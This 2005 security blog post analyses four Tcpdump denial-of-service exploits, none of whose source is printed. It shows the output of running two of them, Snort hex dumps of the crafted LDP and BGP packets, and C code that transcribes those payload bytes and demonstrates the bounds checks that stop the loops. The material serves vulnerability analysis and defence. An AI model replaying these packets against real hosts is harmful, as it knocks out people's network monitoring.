Thursday, April 28, 2005

Tcpdump Vulnerabilities

I learned of four vulnerabilities in Tcpdump found by Vade79 by checking the latest exploits at Packet Storm. Linking to the exploits themselves, they are:

xtcpdump-ldp-dos.c: Tcpdump 3.8.3 and below mishandles Multi-Protocol Label Switching (MPLS) Label Distribution Protocol (LDP) packets. The effect is a local denial of service to Tcpdump. No system needs to be listening to port 646 TCP for Tcpdump to be affected.

If you run xtcpdump-ldp-dos, it looks like this to the attacker:

./xtcpdump-ldp-dos 192.168.1.1 nospoof
[*] tcpdump[3.8.x]: (LDP) ldp_print() infinite loop DOS.
[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)

[*] destination : 192.168.1.1
[*] amount : 5

[+] sending(packet = .): .....

[*] done.

Here is how Tcpdump handles it, if you're running Tcpdump "live" on the CLI without the -v switch:

Unknown Message (0x7fff), length: 0, Message ID:
0xffffffff, Flags: [continue processing if unknown]
Unknown Message (0x7fff), length: 0, Message ID:
0xffffffff, Flags: [continue processing if unknown]
...continues...

If you add the -v switch, you see this:

09:09:02.092665 IP (tos 0x0, ttl 64, id 41668, offset 0,
flags [none], length: 46) 192.168.1.5.52016 > 192.168.1.1.646:
[udp sum ok]
LDP, Label-Space-ID: 255.255.255.255:65535, length: 18
Unknown Message (0x7fff), length: 0, Message ID:
0xffffffff, Flags: [continue processing if unknown]
0x0000: 0402 6ee0 7042 0e6a 0100 4600 0000 4600
0x0010: 0000 1200 0030 4841 f956 00c0 9f3f 4fc5
0x0020: 0800 4500 0038 917f 0000 4001 65ef c0a8
0x0030: 0101 c0a8 0105 0303 2f2c 0000 0000 4500
0x0040: 002e a2c4 0000 4011 54a4 c0a8 0105 c0a8
0x0050: 0101 cb30 0286 001a 0000 6ee0 7042 3b53
0x0060: 0200 3c00 0000 3c00 0000 1200 00c0 9f3f
0x0070: 4fc5 0030 4841 f956 0800 4500 002e a2c5
0x0080: 0000 4011 54a3 c0a8 0105 c0a8 0101 cb31
0x0090: 0286 001a aeaa 0001 ffff ffff ffff ffff
0x00a0: ffff 0000 ffff ffff 1e38 6ee0 7042 4953
0x00b0: 0200 4600 0000 4600 0000 1200 0030 4841
0x00c0: f956 00c0 9f3f 4fc5 0800 4500 0038 9180
0x00d0: 0000 4001 65ee c0a8 0101 c0a8 0105 0303
0x00e0: 2f2b 0000 0000 4500 002e a2c5 0000 4011
0x00f0: 54a3 c0a8 0105 c0a8 0101 cb31 0286 001a
0x0100: 0000 6ee0 7042 783d 0300 3c00 0000 3c00
0x0110: 0000 1200 00c0 9f3f 4fc5 0030 4841 f956
...continues...

Here is how Snort sees the traffic. Only one packet is shown.

04/28-09:07:30.928973 192.168.1.5:52016 -> 192.168.1.1:646
UDP TTL:64 TOS:0x0 ID:41668 IpLen:20 DgmLen:46
Len: 18
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 2E A2 C4 00 00 40 11 54 A4 C0 A8 01 05 C0 A8 ......@.T.......
0x0020: 01 01 CB 30 02 86 00 1A AE AB 00 01 FF FF FF FF ...0............
0x0030: FF FF FF FF FF FF 00 00 FF FF FF FF ............

Here is sample traffic for you to try: ldp-dos.taosecurity.lpc. You should be able to run this through Tcpdump using the -r option without killing Tcpdump.
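The packet that hangs ldp_print() carries a single message whose length field is 0, so a walker that advances the cursor only by that length never makes progress. As an added example (my own code, not tcpdump's), here is a message walker over the 18-byte UDP payload transcribed from the Snort dump above, with the bound on the message length that keeps the cursor moving; the two-message benign PDU is constructed for comparison.

```c
#include <stdint.h>
#include <stdio.h>
#define LDP_HDR_LEN     10   /* version(2) + PDU length(2) + LSR ID(4) + label space(2) */
#define LDP_MSG_HDR_LEN  4   /* U bit + type(2) + message length(2) */
#define LDP_MSG_ID_LEN   4   /* the length field must at least cover the 32-bit message ID */
static unsigned be16(const uint8_t *p) { return ((unsigned)p[0] << 8) | p[1]; }

/* Walk the messages carried in one LDP PDU (the UDP payload). Returns the number of
 * messages seen, or -1 as soon as one cannot be consumed. The check on msg_len is what
 * guarantees the cursor moves on every iteration, which is the property the crafted
 * packet violates with its zero-length message. */
int ldp_count_messages(const uint8_t *pdu, size_t len)
{
    if (len < LDP_HDR_LEN || be16(pdu) != 1) return -1;    /* need a header, version 1 */
    const uint8_t *p = pdu + LDP_HDR_LEN;
    size_t left = len - LDP_HDR_LEN;
    int count = 0;
    while (left > 0) {
        if (left < LDP_MSG_HDR_LEN) return -1;               /* truncated message header */
        unsigned type = be16(p) & 0x7fff;                    /* high bit is the U flag */
        unsigned msg_len = be16(p + 2);
        if (msg_len < LDP_MSG_ID_LEN || msg_len > left - LDP_MSG_HDR_LEN) {
            printf("message 0x%04x with bogus length %u, stopping\n", type, msg_len);
            return -1;
        }
        printf("message 0x%04x, length %u\n", type, msg_len);
        p += LDP_MSG_HDR_LEN + msg_len;
        left -= LDP_MSG_HDR_LEN + msg_len;
        count++;
    }
    return count;
}

/* UDP payload of the crafted packet, transcribed from the Snort dump above: version 1,
 * PDU length 0xffff, LSR 255.255.255.255:65535, then U|0x7fff, length 0, id 0xffffffff. */
const uint8_t ldp_dos_payload[18] = {
    0x00,0x01, 0xff,0xff, 0xff,0xff,0xff,0xff, 0xff,0xff,
    0xff,0xff, 0x00,0x00, 0xff,0xff,0xff,0xff };
/* Constructed benign PDU from 192.168.1.5: a Hello (0x0100) and a KeepAlive (0x0201). */
const uint8_t ldp_benign_pdu[26] = {
    0x00,0x01, 0x00,0x16, 0xc0,0xa8,0x01,0x05, 0x00,0x00,
    0x01,0x00, 0x00,0x04, 0x00,0x00,0x00,0x01,
    0x02,0x01, 0x00,0x04, 0x00,0x00,0x00,0x02 };
int main(void)
{
    printf("crafted: %d\n", ldp_count_messages(ldp_dos_payload, sizeof ldp_dos_payload));
    printf("benign:  %d\n", ldp_count_messages(ldp_benign_pdu, sizeof ldp_benign_pdu));
    return 0;
}
```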

xtcpdump-bgp-dos.c: Tcpdump 3.8.3 and below mishandles Border Gateway Protocol (BGP) packets. The effect is a local denial of service to Tcpdump. A system watched by Tcpdump needs to be listening on port 179 TCP for Tcpdump to be affected. I simulated this by having Netcat listen on port 179 TCP.

If you run xtcpdump-bgp-dos.c, it looks like this to the attacker:

./xtcpdump-bgp-dos.c 192.168.1.1 nospoof
[*] tcpdump[3.8.x]: (BGP) RT_ROUTING_INFO infinite loop DOS.
[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)

[*] target: 192.168.1.1
[*] attempting to connect...
[*] successfully connected.
[*] sending malformed BGP data. (34 bytes)
[*] closing connection.

[*] done.

Here is how Tcpdump handles it, if you're running Tcpdump "live" on the CLI:

tcpdump -n -i em1 -s 1515 -v

tcpdump: listening on em1, link-type EN10MB (Ethernet), capture size 1515 bytes
09:04:48.530004 IP (tos 0x0, ttl 64, id 37797, offset 0,
flags [DF], length: 60) 192.168.1.5.57471 > 192.168.1.1.179:
S [tcp sum ok] 2061108147:2061108147(0) win 65535 <mss 1460,nop,wscale 1,nop,nop,timestamp 145837700 0>

09:04:48.530039 IP (tos 0x0, ttl 64, id 30686, offset 0,
flags [DF], length: 60) 192.168.1.1.179 > 192.168.1.5.57471:
S [bad tcp cksum 8385 (->b9d4)!] 2753925437:2753925437(0)
ack 2061108148 win 65535 <mss 1460,nop,wscale 1,nop,nop,timestamp 207951117 145837700>

09:04:48.530250 IP (tos 0x0, ttl 64, id 37798, offset 0,
flags [DF], length: 52) 192.168.1.5.57471 > 192.168.1.1.179:
. [tcp sum ok] ack 1 win 33304 <nop,nop,timestamp 145837700 207951117>

09:04:49.031589 IP (tos 0x0, ttl 64, id 37800, offset 0,
flags [DF], length: 87) 192.168.1.5.57471 > 192.168.1.1.179:
P [tcp sum ok] 1:36(35) ack 1 win 33304 <nop,nop,timestamp 145837751 207951117>: BGP, length: 35
Update Message (2), length: 19
Withdrawn routes: 1 bytes
Multi-Protocol Reach NLRI (14), length: 255,
Flags [OTPE+f]:
AFI: IPv4 (1), vendor specific SAFI: Route Target
Routing Information (132), no SNPA
(illegal prefix length)
(illegal prefix length)
...continues...

Here is how Snort sees the traffic. Although the entire session is shown, the fourth packet is the killer.

04/28-09:03:17.383320 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:37797 IpLen:20 DgmLen:60 DF
******S* Seq: 0x7ADA03B3 Ack: 0x0 Win: 0xFFFF TcpLen: 40
TCP Options (6) => MSS: 1460 NOP WS: 1 NOP NOP TS: 145837700 0
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 3C 93 A5 40 00 40 06 23 C0 C0 A8 01 05 C0 A8 .<..@.@.#.......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 B3 00 00 00 00 A0 02 ......z.........
0x0030: FF FF 10 BB 00 00 02 04 05 B4 01 03 03 01 01 01 ................
0x0040: 08 0A 08 B1 4E 84 00 00 00 00 ....N.....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.383581 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:30686 IpLen:20 DgmLen:60 DF
***A**S* Seq: 0xA425913D Ack: 0x7ADA03B4 Win: 0xFFFF TcpLen: 40
TCP Options (6) => MSS: 1460 NOP WS: 1 NOP NOP TS: 207951117 145837700
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00 .0HA.V...?O...E.
0x0010: 00 3C 77 DE 40 00 40 06 3F 87 C0 A8 01 01 C0 A8 .<w.@.@.?.......
0x0020: 01 05 00 B3 E0 7F A4 25 91 3D 7A DA 03 B4 A0 12 .......%.=z.....
0x0030: FF FF B9 D4 00 00 02 04 05 B4 01 03 03 01 01 01 ................
0x0040: 08 0A 0C 65 15 0D 08 B1 4E 84 ...e....N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.383646 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:37798 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x7ADA03B4 Ack: 0xA425913E Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837700 207951117
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 34 93 A6 40 00 40 06 23 C7 C0 A8 01 05 C0 A8 .4..@.@.#.......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 B4 A4 25 91 3E 80 10 ......z....%.>..
0x0030: 82 18 63 81 00 00 01 01 08 0A 08 B1 4E 84 0C 65 ..c.........N..e
0x0040: 15 0D ..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.884950 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:37800 IpLen:20 DgmLen:87 DF
***AP*** Seq: 0x7ADA03B4 Ack: 0xA425913E Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837751 207951117
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 57 93 A8 40 00 40 06 23 A2 C0 A8 01 05 C0 A8 .W..@.@.#.......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 B4 A4 25 91 3E 80 18 ......z....%.>..
0x0030: 82 18 DC FF 00 00 01 01 08 0A 08 B1 4E B7 0C 65 ............N..e
0x0040: 15 0D FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
0x0050: FF FF 00 13 02 00 01 00 FF 00 FF 0E 00 FF 00 01 ................
0x0060: 84 00 00 00 00 .....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.984345 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:30793 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xA425913E Ack: 0x7ADA03D7 Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 207951178 145837751
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00 .0HA.V...?O...E.
0x0010: 00 34 78 49 40 00 40 06 3F 24 C0 A8 01 01 C0 A8 .4xI@.@.?$......
0x0020: 01 05 00 B3 E0 7F A4 25 91 3E 7A DA 03 D7 80 10 .......%.>z.....
0x0030: 82 18 62 EE 00 00 01 01 08 0A 0C 65 15 4A 08 B1 ..b........e.J..
0x0040: 4E B7 N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396501 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:38045 IpLen:20 DgmLen:52 DF
***A***F Seq: 0x7ADA03D7 Ack: 0xA425913E Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837802 207951178
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 34 94 9D 40 00 40 06 22 D0 C0 A8 01 05 C0 A8 .4..@.@.".......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 D7 A4 25 91 3E 80 11 ......z....%.>..
0x0030: 82 18 62 BA 00 00 01 01 08 0A 08 B1 4E EA 0C 65 ..b.........N..e
0x0040: 15 4A .J

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396841 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:31075 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xA425913E Ack: 0x7ADA03D8 Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 207951219 145837802
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00 .0HA.V...?O...E.
0x0010: 00 34 79 63 40 00 40 06 3E 0A C0 A8 01 01 C0 A8 .4yc@.@.>.......
0x0020: 01 05 00 B3 E0 7F A4 25 91 3E 7A DA 03 D8 80 10 .......%.>z.....
0x0030: 82 18 62 91 00 00 01 01 08 0A 0C 65 15 73 08 B1 ..b........e.s..
0x0040: 4E EA N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396856 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:31076 IpLen:20 DgmLen:52 DF
***A***F Seq: 0xA425913E Ack: 0x7ADA03D8 Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 207951219 145837802
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00 .0HA.V...?O...E.
0x0010: 00 34 79 64 40 00 40 06 3E 09 C0 A8 01 01 C0 A8 .4yd@.@.>.......
0x0020: 01 05 00 B3 E0 7F A4 25 91 3E 7A DA 03 D8 80 11 .......%.>z.....
0x0030: 82 18 62 90 00 00 01 01 08 0A 0C 65 15 73 08 B1 ..b........e.s..
0x0040: 4E EA N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396922 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:38046 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x7ADA03D8 Ack: 0xA425913F Win: 0x8217 TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837802 207951219
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 34 94 9E 40 00 40 06 22 CF C0 A8 01 05 C0 A8 .4..@.@.".......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 D8 A4 25 91 3F 80 10 ......z....%.?..
0x0030: 82 17 62 91 00 00 01 01 08 0A 08 B1 4E EA 0C 65 ..b.........N..e
0x0040: 15 73 .s

Here is sample traffic for you to try: bgp-dos.taosecurity.lpc. You should be able to run this through Tcpdump using the -r option without killing Tcpdump.
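The endless "(illegal prefix length)" lines come from the MP_REACH_NLRI walk: the NLRI bytes in the fourth packet are 00 00, a prefix length of zero, and a loop that re-decodes the same bytes, or adds the decoder's error return to its cursor, prints that line forever. As an added example (my own code, not tcpdump's), this decodes Route Target Routing Information entries from those two bytes and from a constructed valid entry and stops on the error instead of advancing by it; treating a prefix shorter than the 32-bit origin AS as illegal is this example's rule, not necessarily tcpdump's.

```c
#include <stdint.h>
#include <stdio.h>
/* Decode one Route Target Routing Information NLRI entry (SAFI 132): a one-byte prefix
 * length in bits, a 4-byte origin AS, then the route target bits. Treating a prefix shorter
 * than the origin AS (or longer than AS + 64-bit RT) as illegal is this example's rule.
 * Returns the bytes consumed (always >= 1), or -1 for a malformed entry. */
int decode_rt_routing_info(const uint8_t *p, size_t left, uint32_t *origin_as)
{
    if (left < 1) return -1;
    unsigned plen = p[0];
    if (plen < 32 || plen > 96) return -1;       /* "(illegal prefix length)" */
    size_t need = 1 + (plen + 7) / 8;            /* length byte plus prefix bytes */
    if (need > left) return -1;                  /* entry runs past the attribute */
    *origin_as = ((uint32_t)p[1] << 24) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 8) | p[4];
    return (int)need;
}

/* Walk every entry in the NLRI part of an MP_REACH_NLRI attribute.
 * Returns the number of entries, or -1 as soon as one cannot be decoded. */
int walk_rt_nlri(const uint8_t *nlri, size_t len)
{
    const uint8_t *p = nlri; size_t left = len; int count = 0;
    while (left > 0) {
        uint32_t as = 0;
        int advance = decode_rt_routing_info(p, left, &as);
        /* An error return is not a byte count: adding it to the cursor (or adding nothing)
         * re-decodes the same bytes forever. Abort the walk instead. */
        if (advance < 1 || (size_t)advance > left) {
            printf("(illegal prefix length) at offset %zu, stopping\n", (size_t)(p - nlri));
            return -1;
        }
        printf("RT routing info entry: origin AS %u, %d bytes\n", as, advance);
        p += advance;
        left -= (size_t)advance;
        count++;
    }
    return count;
}

/* NLRI bytes of the fourth packet in the Snort dump above, after "AFI 1, SAFI 132,
 * next hop length 0, 0 SNPAs": prefix length 0, then one more zero byte. */
const uint8_t bgp_dos_nlri[2] = { 0x00, 0x00 };
/* Constructed well-formed entry: 96-bit prefix = origin AS 65000, route target 65000:100. */
const uint8_t rt_nlri_ok[13] = { 0x60, 0x00,0x00,0xfd,0xe8, 0x00,0x02,0xfd,0xe8, 0x00,0x00,0x00,0x64 };
int main(void)
{
    printf("crafted: %d\n", walk_rt_nlri(bgp_dos_nlri, sizeof bgp_dos_nlri));
    printf("benign:  %d\n", walk_rt_nlri(rt_nlri_ok, sizeof rt_nlri_ok));
    return 0;
}
```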

Vade79 also released exploits titled xtcpdump-isis-dos.c and xtcpdump+ethr-rsvp-dos.c, for Intermediate System to Intermediate System (IS-IS) and Resource ReSerVation setup Protocol (RSVP), respectively.

While I could get all four exploits to compile on FreeBSD, I could not get these last two to generate traffic. I believe the problem lies with the spoofing mechanism in each exploit. I was only able to get the first two exploits to work when I enabled the "nospoof" options.

Keep an eye on Tcpdump.org and the tcpdump-workers mailing list for developments. The latest tcpdump-current.tar.gz or CVS check-outs should be patched. I also expect to see a Tcpdump 3.9.0 official release patched against these problems next week.
